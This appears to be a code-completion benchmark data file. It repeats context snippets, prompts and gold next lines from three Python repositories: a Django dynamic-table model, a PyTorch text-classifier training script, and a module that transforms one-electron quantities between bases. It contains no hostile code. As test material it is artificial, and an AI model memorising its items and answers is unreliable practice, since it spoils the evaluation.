('bool', 'Bool'),
('textfield', 'TextField'),
('date', 'Date'),
)
# Create your models here.
class DynamicTable(models.Model):
table_name = models.CharField(_('Table Name'), max_length=255, unique=True)
table_description = models.TextField(_('Table Description'), blank=True)
date_created = models.DateTimeField(_('Date Created'), default=timezone.now)
table_columns = models.ManyToManyField('TableColumn', blank=True)
table_rows = models.ManyToManyField('TableRow', blank=True)
class Meta:
ordering = ('-date_created', )
def __str__(self) -> str:
return f"{self.table_name}"
def __total_table_rows(self) -> int:
field = self.table_columns.first()
if field and isinstance(field, TableColumn):
return self.table_columns.all().count()
else:
# the table is empty
return 0
def __total_table_columns(self) -> int:
return self.table_columns.all().count()
def table_info(self) -> dict[str, int]:
description = {
'rows': self.__total_table_rows(),
'columns': self.__total_table_columns()
}
return description
def is_empty(self) -> bool:
table_info = self.table_info()
rows = table_info['rows']
columns = table_info['columns']
return True if columns == 0 or rows == 0 else False
def is_column(self, column_name: str) -> bool:
if not isinstance(column_name, str):
raise ValueError("column name must be a str")
try:
column = self.table_columns.get(column_name=column_name)
return True
except TableColumn.DoesNotExist:
return False
def get_supported_data_types(self) -> list[str]:
return [data_type[0] for data_type in __SUPPORTED_DATA_TYPE_CHOICES__]
def data_type_is_supported(self, data_type: str | list) -> bool | list[bool]:
supported_data_types = self.get_supported_data_types()
if isinstance(data_type, str):
return data_type.lower().strip() in supported_data_types
elif isinstance(data_type, (list, tuple, set)):
return [_type.lower().strip() in supported_data_types for _type in data_type]
else:
raise ValueError('arg must be either a str or a sequence')
def add_column(self, column_name: str, data_type: str):
if isinstance(column_name, str) and isinstance(data_type, str):
if not self.data_type_is_supported(data_type):
raise UnSupportedDataType()
if self.is_column(column_name):
| """
Creating a Dynamic Table using conventional Django standard
This Table gives you more control over it manipulation than Django models
Developed by: Samuel Effiong Nkopuruk
Email: [email protected]
"""
__SUPPORTED_DATA_TYPE_CHOICES__ = (
('char', 'Char'),
('int', 'Int'),
('float', 'Float'),
('bool', 'Bool'),
('textfield', 'TextField'),
('date', 'Date'),
)
# Create your models here.
class DynamicTable(models.Model):
table_name = models.CharField(_('Table Name'), max_length=255, unique=True)
table_description = models.TextField(_('Table Description'), blank=True)
date_created = models.DateTimeField(_('Date Created'), default=timezone.now)
table_columns = models.ManyToManyField('TableColumn', blank=True)
table_rows = models.ManyToManyField('TableRow', blank=True)
class Meta:
ordering = ('-date_created', )
def __str__(self) -> str:
return f"{self.table_name}"
def __total_table_rows(self) -> int:
field = self.table_columns.first()
if field and isinstance(field, TableColumn):
return self.table_columns.all().count()
else:
# the table is empty
return 0
def __total_table_columns(self) -> int:
return self.table_columns.all().count()
def table_info(self) -> dict[str, int]:
description = {
'rows': self.__total_table_rows(),
'columns': self.__total_table_columns()
}
return description
def is_empty(self) -> bool:
table_info = self.table_info()
rows = table_info['rows']
columns = table_info['columns']
return True if columns == 0 or rows == 0 else False
def is_column(self, column_name: str) -> bool:
if not isinstance(column_name, str):
raise ValueError("column name must be a str")
try:
column = self.table_columns.get(column_name=column_name)
return True
except TableColumn.DoesNotExist:
return False
def get_supported_data_types(self) -> list[str]:
return [data_type[0] for data_type in __SUPPORTED_DATA_TYPE_CHOICES__]
def data_type_is_supported(self, data_type: str | list) -> bool | list[bool]:
supported_data_types = self.get_supported_data_types()
if isinstance(data_type, str):
return data_type.lower().strip() in supported_data_types
elif isinstance(data_type, (list, tuple, set)):
return [_type.lower().strip() in supported_data_types for _type in data_type]
else:
raise ValueError('arg must be either a str or a sequence')
def add_column(self, column_name: str, data_type: str):
if isinstance(column_name, str) and isinstance(data_type, str):
if not self.data_type_is_supported(data_type):
raise UnSupportedDataType()
if self.is_column(column_name):
| raise DuplicateColumnInTable()
| 4 | 2023-12-19 15:50:38+00:00 | 2k |
gsamil/text-classification | recommender/train.py | [
{
"identifier": "vocab",
"path": "data.py",
"snippet": "class ClassificationSample(BaseModel):\ndef preprocess_text(text: str) -> str:\ndef get_samples_from_file(file_path: str) -> list[ClassificationSample]:\ndef stratify_samples(\n samples: list[ClassificationSample], number_per_sample: int\n) -> list[ClassificationSample]:\ndef save_categories(train_file: str) -> None:\ndef load_categories() -> Tuple[list[str], dict[str, int]]:\ndef set_feature_dimension(lst: list[int], target_length: int):\ndef print_text_lengths(train_file: str) -> None:"
},
{
"identifier": "TextClassifier",
"path": "model.py",
"snippet": "class HyperParameters(BaseModel):\nclass TrainingParameters(BaseModel):\nclass TextClassifier(nn.Module):\n def to_dict(self) -> dict[Any, Any]:\n def load_from_json(cls, file_path: str) -> \"HyperParameters\":\n def print(self):\n def to_dict(self) -> dict[Any, Any]:\n def load_from_json(cls, file_path: str) -> \"TrainingParameters\":\n def print(self):\n def __init__(self, hparameters: HyperParameters):\n def forward(self, x):\n def save_model(\n self, model_dir: str, training_parameters: TrainingParameters\n ) -> None:\n def load_from_dir(\n cls, model_dir: str, device: Union[str, torch.device]\n ) -> Tuple[\"TextClassifier\", TrainingParameters]:"
},
{
"identifier": "ClassificationDataset",
"path": "recommender/dataset.py",
"snippet": "class ClassificationDataset(Dataset):\n def __init__(\n self,\n samples: list[ClassificationSample],\n vocab: dict[str, int],\n categories: list[str],\n category_to_idx: dict[str, int],\n feature_size: int,\n sample_negatives: int | None,\n shuffle: bool,\n ):\n self.data: list[ClassificationSample] = samples\n self.vocab: dict[str, int] = vocab\n self.categories: list[str] = categories\n self.category_to_idx: dict[str, int] = category_to_idx\n self.feature_size: int = feature_size\n self.sample_negatives: int | None = sample_negatives\n self.shuffle: bool = shuffle\n\n def __len__(self) -> int:\n return len(self.data)\n\n def __getitem__(self, idx) -> Tuple[torch.LongTensor, list[int], int]:\n example = self.data[idx]\n combined_features_positive = []\n combined_features_negative = []\n for category in self.categories:\n # this is the part where we convert product text and category to indexes\n product_text_tokens = [self.vocab[token] for token in example.product_text]\n category_tokens = [self.vocab[token] for token in category]\n product_text_token_indexes = set_feature_dimension(\n product_text_tokens,\n self.feature_size - len(category_tokens),\n )\n token_indexes = product_text_token_indexes + category_tokens\n\n if example.category == category:\n combined_features_positive.append(token_indexes)\n else:\n combined_features_negative.append(token_indexes)\n\n if self.sample_negatives is not None:\n combined_features_negative = random.sample(\n combined_features_negative, self.sample_negatives\n )\n combined_features_with_labels = [\n (feature, 1) for feature in combined_features_positive\n ] + [(feature, 0) for feature in combined_features_negative]\n\n if self.shuffle:\n random.shuffle(combined_features_with_labels)\n return (\n torch.LongTensor([f for f, _ in combined_features_with_labels]),\n [l for _, l in combined_features_with_labels],\n [i for i, (_, l) in enumerate(combined_features_with_labels) if l == 1][0],\n )"
},
{
"identifier": "CATEGORIES_PATH",
"path": "settings.py",
"snippet": "CATEGORIES_PATH = \"./data/categories.csv\""
}
] | import torch
import time
import os
from torch import nn
from torch.utils.data import DataLoader
from torch.optim.lr_scheduler import ExponentialLR
from data import (
vocab,
get_samples_from_file,
stratify_samples,
save_categories,
load_categories,
)
from model import TextClassifier, TrainingParameters, device, HyperParameters
from recommender.dataset import ClassificationDataset
from settings import CATEGORIES_PATH | 1,057 |
# Set `train_file`, `test_file` and `model_dir` apropriately.
# Set `negative_samples` to the number of negative samples you want to use.
# run with `export PYTHONPATH=. && python recommender/train.py` in the main directory.
train_file = "./data/train_cleaned.csv"
test_file = "./data/test_cleaned.csv"
model_dir = "./recommender/saved_model"
if __name__ == "__main__":
hparams = HyperParameters(
|
# Set `train_file`, `test_file` and `model_dir` apropriately.
# Set `negative_samples` to the number of negative samples you want to use.
# run with `export PYTHONPATH=. && python recommender/train.py` in the main directory.
train_file = "./data/train_cleaned.csv"
test_file = "./data/test_cleaned.csv"
model_dir = "./recommender/saved_model"
if __name__ == "__main__":
hparams = HyperParameters( | vocab_size=len(vocab), | 0 | 2023-12-17 11:37:37+00:00 | 2k |
zhcui/polar_preview | polar/basis/trans_1e.py | [
{
"identifier": "mdot",
"path": "polar/utils/misc.py",
"snippet": "def mdot(*args):\n \"\"\"\n Reduced matrix dot.\n \"\"\"\n return reduce(np.dot, args)"
},
{
"identifier": "kdot",
"path": "polar/utils/misc.py",
"snippet": "def kdot(a, b):\n \"\"\"\n Matrix dot with kpoints.\n \"\"\"\n ka, s1_a, _ = a.shape\n kb, _, s2_b = b.shape\n assert ka == kb\n res = np.zeros((ka, s1_a, s2_b), dtype=np.result_type(a.dtype, b.dtype))\n for k in range(ka):\n np.dot(a[k], b[k], out=res[k])\n return res"
},
{
"identifier": "get_spin_dim",
"path": "polar/utils/misc.py",
"snippet": "def get_spin_dim(arrays, non_spin_dim=3):\n \"\"\"\n Get spin dimension for a list of arrays.\n \"\"\"\n spin = 1\n for a in arrays:\n a = np.asarray(a)\n if a.ndim == non_spin_dim:\n continue\n elif a.ndim == non_spin_dim + 1:\n spin = max(spin, a.shape[0])\n else:\n raise ValueError\n return spin"
},
{
"identifier": "add_spin_dim",
"path": "polar/utils/misc.py",
"snippet": "def add_spin_dim(H, spin, non_spin_dim=3):\n \"\"\"\n Add an additional dimension to array H.\n \"\"\"\n H = np.asarray(H)\n if H.ndim == non_spin_dim:\n H = H[None]\n assert H.ndim == (non_spin_dim + 1)\n if H.shape[0] < spin:\n H = np.asarray((H[0],) * spin)\n return H"
}
] | import numpy as np
import scipy.linalg as la
from polar.utils.misc import (mdot, kdot, get_spin_dim, add_spin_dim) | 798 | #!/usr/bin/env python
"""
Transform 1e quantities.
Authors:
Zhi-Hao Cui
Tianyu Zhu
Shunyue Yuan
"""
# *****************************************************************************
# Transform functions AO -> LO and LO -> AO
# for h1 and rdm1
# *****************************************************************************
def trans_h1_to_lo(h_ao_ao, C_ao_lo):
r"""
Transform h1 to lo basis, with kpts.
h^{LO} = C^{\dagger} h^{AO} C
"""
h_ao_ao = np.asarray(h_ao_ao)
C_ao_lo = np.asarray(C_ao_lo)
nkpts = C_ao_lo.shape[-3]
nlo = C_ao_lo.shape[-1]
res_type = np.result_type(h_ao_ao.dtype, C_ao_lo.dtype)
# treat the special case where h is 0 or [0, 0]
if h_ao_ao.ndim == 0: # scalar
return np.ones((nkpts, nlo, nlo), dtype=res_type) * h_ao_ao
elif h_ao_ao.ndim == 1: # [0, 0]
spin = len(h_ao_ao)
h_lo_lo = np.ones((spin, nkpts, nlo, nlo), dtype=res_type)
for s in range(spin):
h_lo_lo[s] *= h_ao_ao[s]
return h_lo_lo
if C_ao_lo.ndim == 3 and h_ao_ao.ndim == 3:
h_lo_lo = np.zeros((nkpts, nlo, nlo), dtype=res_type)
for k in range(nkpts):
| #!/usr/bin/env python
"""
Transform 1e quantities.
Authors:
Zhi-Hao Cui
Tianyu Zhu
Shunyue Yuan
"""
# *****************************************************************************
# Transform functions AO -> LO and LO -> AO
# for h1 and rdm1
# *****************************************************************************
def trans_h1_to_lo(h_ao_ao, C_ao_lo):
r"""
Transform h1 to lo basis, with kpts.
h^{LO} = C^{\dagger} h^{AO} C
"""
h_ao_ao = np.asarray(h_ao_ao)
C_ao_lo = np.asarray(C_ao_lo)
nkpts = C_ao_lo.shape[-3]
nlo = C_ao_lo.shape[-1]
res_type = np.result_type(h_ao_ao.dtype, C_ao_lo.dtype)
# treat the special case where h is 0 or [0, 0]
if h_ao_ao.ndim == 0: # scalar
return np.ones((nkpts, nlo, nlo), dtype=res_type) * h_ao_ao
elif h_ao_ao.ndim == 1: # [0, 0]
spin = len(h_ao_ao)
h_lo_lo = np.ones((spin, nkpts, nlo, nlo), dtype=res_type)
for s in range(spin):
h_lo_lo[s] *= h_ao_ao[s]
return h_lo_lo
if C_ao_lo.ndim == 3 and h_ao_ao.ndim == 3:
h_lo_lo = np.zeros((nkpts, nlo, nlo), dtype=res_type)
for k in range(nkpts): | h_lo_lo[k] = mdot(C_ao_lo[k].conj().T, h_ao_ao[k], C_ao_lo[k]) | 0 | 2023-12-18 07:39:51+00:00 | 2k |
Subsets and Splits